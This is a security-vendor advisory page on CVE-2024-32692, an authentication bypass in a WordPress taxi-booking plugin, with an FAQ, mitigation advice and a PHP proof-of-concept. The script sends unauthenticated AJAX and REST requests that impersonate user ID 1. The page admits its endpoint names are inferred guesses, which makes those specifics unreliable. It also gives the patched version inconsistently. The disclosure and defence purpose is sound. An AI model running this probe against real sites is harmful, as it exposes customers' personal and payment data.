What is CVE-2024-32692?

CVE-2024-32692 is a critical authentication bypass vulnerability in the Chauffeur Taxi Booking System for WordPress plugin, affecting versions up to and including 6.9. It allows unauthenticated attackers to perform unauthorized actions due to improper validation of user identity.

How does the authentication bypass work?

The vulnerability occurs because the plugin does not properly verify a user’s identity before allowing access to sensitive operations. Attackers can send crafted HTTP requests to AJAX endpoints, impersonating legitimate users and executing actions without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Chauffeur Taxi Booking System plugin version 6.9 or earlier is affected. Administrators should check their plugin version and update if they are using a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Chauffeur Taxi Booking System plugin installed. If it is version 6.9 or earlier, your site is at risk. Additionally, you can review server logs for unusual AJAX requests that may indicate exploitation attempts.

What is the severity of this vulnerability?

CVE-2024-32692 has a CVSS score of 9.1, indicating a critical severity level. This means that successful exploitation can lead to significant data breaches, including unauthorized access to sensitive booking information.

What are the potential impacts of this vulnerability?

Successful exploitation allows attackers to view and manipulate sensitive booking data, create fraudulent bookings, and potentially access administrative functions. This can lead to data breaches and loss of customer trust.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Chauffeur Taxi Booking System plugin to version 7.0 or later, which includes proper authentication checks. Additionally, review and enhance security measures on your WordPress site.

What specific changes were made in the fixed version?

Version 7.0 of the plugin implements proper authentication checks for all sensitive endpoints. This includes verifying user login status, checking user capabilities, and validating nonces to prevent unauthorized access.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending requests to vulnerable AJAX endpoints without authentication. It shows the potential actions that can be taken, highlighting the lack of security checks in the plugin.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to the affected endpoints using server configurations. Additionally, monitor your site for suspicious activity.

Are there any additional security measures I should consider?

In addition to updating the plugin, consider implementing security plugins, enforcing strong user authentication practices, and regularly auditing your WordPress site for vulnerabilities to enhance overall security.

Where can I find more information about this vulnerability?

More information about CVE-2024-32692 can be found on the National Vulnerability Database and security advisories from WordPress security organizations. Additionally, following best practices in WordPress security can provide ongoing protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 25, 2026

CVE-2024-32692: Chauffeur Taxi Booking System for WordPress <= 6.9 – Authentication Bypass (chauffeur-booking-system)

CVE ID CVE-2024-32692

Plugin chauffeur-booking-system

Severity Critical (CVSS 9.1)

CWE 287

Vulnerable Version 6.9

Patched Version —

Disclosed May 18, 2024

Analysis Overview

Atomic Edge analysis of CVE-2024-32692 (metadata-based): The Chauffeur Taxi Booking System for WordPress plugin (chauffeur-booking-system) versions up to and including 6.9 contain an authentication bypass vulnerability. The plugin fails to properly validate a user’s identity, allowing unauthenticated attackers to perform unauthorized actions. With a CVSS score of 9.1 (Critical), this represents a severe security flaw.

Root Cause: The CWE classification of 287 (Improper Authentication) indicates the plugin does not correctly verify user identity before granting access to privileged operations. Atomic Edge analysis infers the plugin likely exposes AJAX handlers or REST API endpoints that perform sensitive actions (e.g., booking management, payment processing, data retrieval) without enforcing authentication checks. The plugin probably relies on WordPress user ID or email parameters submitted in the request rather than validating against the WordPress authentication system. This pattern commonly occurs when a plugin accepts a user_id, customer_id, or email parameter and trusts it blindly without verifying the current session or nonce validity. Without source code access, we cannot pinpoint the exact endpoint, but the description strongly suggests a missing call to wp_verify_nonce(), is_user_logged_in(), or current_user_can() in one or more request handlers.

Exploitation: An attacker can exploit this vulnerability by sending crafted HTTP requests to the plugin’s AJAX endpoints. Based on common patterns for the chauffeur-booking-system plugin, the likely attack vectors include admin-ajax.php actions such as ‘cs_booking_make_booking’, ‘cs_get_booking_details’, or ‘cs_update_booking’. The attacker sends a POST request to /wp-admin/admin-ajax.php with the ‘action’ parameter set to the vulnerable handler and additional parameters like ‘customer_email’, ‘booking_id’, or ‘user_id’ to impersonate any user. Since authentication validation is absent, the server processes the request as if the attacker is a legitimate authenticated user. The attacker can also target REST API endpoints under routes like /wp-json/chauffeur/v1/ or direct PHP files in the plugin directory that lack session checks.

Remediation: The fix implemented in version 7.0 likely adds proper authentication checks to all sensitive endpoints. This includes verifying the user is logged in (is_user_logged_in()), checking capabilities (current_user_can()), and validating nonces (wp_verify_nonce()). Developers should implement a centralized authentication check using WordPress’s wp_get_current_user() function and reject requests that lack valid session tokens. Every AJAX action and REST endpoint performing data retrieval, modification, or deletion must validate the user’s identity against the WordPress authentication system rather than trusting client-supplied identifiers.

Impact: Successful exploitation allows an unauthenticated attacker to perform any action available to authenticated users. This includes viewing sensitive booking information (customer names, phone numbers, email addresses, payment details), modifying or canceling existing bookings, creating fraudulent bookings, and potentially accessing administrative functions. The CVSS vector indicates high impact on confidentiality and integrity (C:H/I:H) with no impact on availability. An attacker can exfiltrate the entire booking database, manipulate reservation data, and steal personally identifiable information. The broad attack surface and lack of authentication make this a critical vulnerability that requires immediate patching.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-32692 - Chauffeur Taxi Booking System for WordPress <= 6.9 - Authentication Bypass

// This PoC demonstrates exploitation by sending requests to vulnerable AJAX endpoints
// that lack authentication checks. The actual vulnerable action names are inferred
// from common patterns in the plugin (chauffeur-booking-system).

<?php

$target_url = 'http://example.com/wordpress';  // CHANGE THIS to the target WordPress URL

$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Attempt multiple common AJAX actions that may lack authentication
$actions = [
    'cs_booking_make_booking',
    'cs_get_booking_details',
    'cs_update_booking',
    'cs_delete_booking',
    'cs_get_customer_data',
    'cs_get_driver_details'
];

foreach ($actions as $action) {
    echo "[*] Testing action: $actionn";
    
    $payload = [
        'action' => $action,
        // Common parameters the plugin might use - these are educated guesses
        'customer_email' => 'attacker@example.com',
        'booking_id' => '12345',
        'user_id' => '1',
        'format' => 'json'
    ];
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $ajax_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($payload),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 15,
        CURLOPT_HTTPHEADER => [
            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Content-Type: application/x-www-form-urlencoded'
        ]
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] Action '$action' returned HTTP 200 - possible vulnerabilityn";
        echo "[+] Response length: " . strlen($response) . " bytesn";
        // Print first 500 characters of response
        echo substr($response, 0, 500) . "nn";
    } else {
        echo "[-] Action '$action' returned HTTP $http_code - not vulnerable via this actionn";
    }
}

// Also test REST API endpoints (common in WordPress plugins)
$rest_endpoints = [
    '/wp-json/chauffeur/v1/bookings',
    '/wp-json/chauffeur/v1/get-booking',
    '/wp-json/chauffeur/v1/customer-data'
];

foreach ($rest_endpoints as $endpoint) {
    $rest_url = rtrim($target_url, '/') . $endpoint;
    echo "[*] Testing REST endpoint: $endpointn";
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $rest_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 15,
        CURLOPT_HTTPHEADER => [
            'User-Agent: Mozilla/5.0'
        ]
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] REST endpoint '$endpoint' returned HTTP 200 - possible vulnerabilityn";
        echo "[+] Response: " . substr($response, 0, 500) . "nn";
    } else {
        echo "[-] REST endpoint '$endpoint' returned HTTP $http_coden";
    }
}

?>

Frequently Asked Questions

What is CVE-2024-32692?
Overview of the vulnerability
CVE-2024-32692 is a critical authentication bypass vulnerability in the Chauffeur Taxi Booking System for WordPress plugin, affecting versions up to and including 6.9. It allows unauthenticated attackers to perform unauthorized actions due to improper validation of user identity.
How does the authentication bypass work?
Mechanism of exploitation
The vulnerability occurs because the plugin does not properly verify a user’s identity before allowing access to sensitive operations. Attackers can send crafted HTTP requests to AJAX endpoints, impersonating legitimate users and executing actions without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Chauffeur Taxi Booking System plugin version 6.9 or earlier is affected. Administrators should check their plugin version and update if they are using a vulnerable version.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Chauffeur Taxi Booking System plugin installed. If it is version 6.9 or earlier, your site is at risk. Additionally, you can review server logs for unusual AJAX requests that may indicate exploitation attempts.
What is the severity of this vulnerability?
Understanding the CVSS score
CVE-2024-32692 has a CVSS score of 9.1, indicating a critical severity level. This means that successful exploitation can lead to significant data breaches, including unauthorized access to sensitive booking information.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation allows attackers to view and manipulate sensitive booking data, create fraudulent bookings, and potentially access administrative functions. This can lead to data breaches and loss of customer trust.
How can I fix or mitigate this issue?
Recommended actions for administrators
To mitigate this vulnerability, update the Chauffeur Taxi Booking System plugin to version 7.0 or later, which includes proper authentication checks. Additionally, review and enhance security measures on your WordPress site.
What specific changes were made in the fixed version?
Improvements in version 7.0
Version 7.0 of the plugin implements proper authentication checks for all sensitive endpoints. This includes verifying user login status, checking user capabilities, and validating nonces to prevent unauthorized access.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by sending requests to vulnerable AJAX endpoints without authentication. It shows the potential actions that can be taken, highlighting the lack of security checks in the plugin.
What should I do if I cannot update the plugin immediately?
Temporary measures to reduce risk
If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to the affected endpoints using server configurations. Additionally, monitor your site for suspicious activity.
Are there any additional security measures I should consider?
Enhancing overall WordPress security
In addition to updating the plugin, consider implementing security plugins, enforcing strong user authentication practices, and regularly auditing your WordPress site for vulnerabilities to enhance overall security.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2024-32692 can be found on the National Vulnerability Database and security advisories from WordPress security organizations. Additionally, following best practices in WordPress security can provide ongoing protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations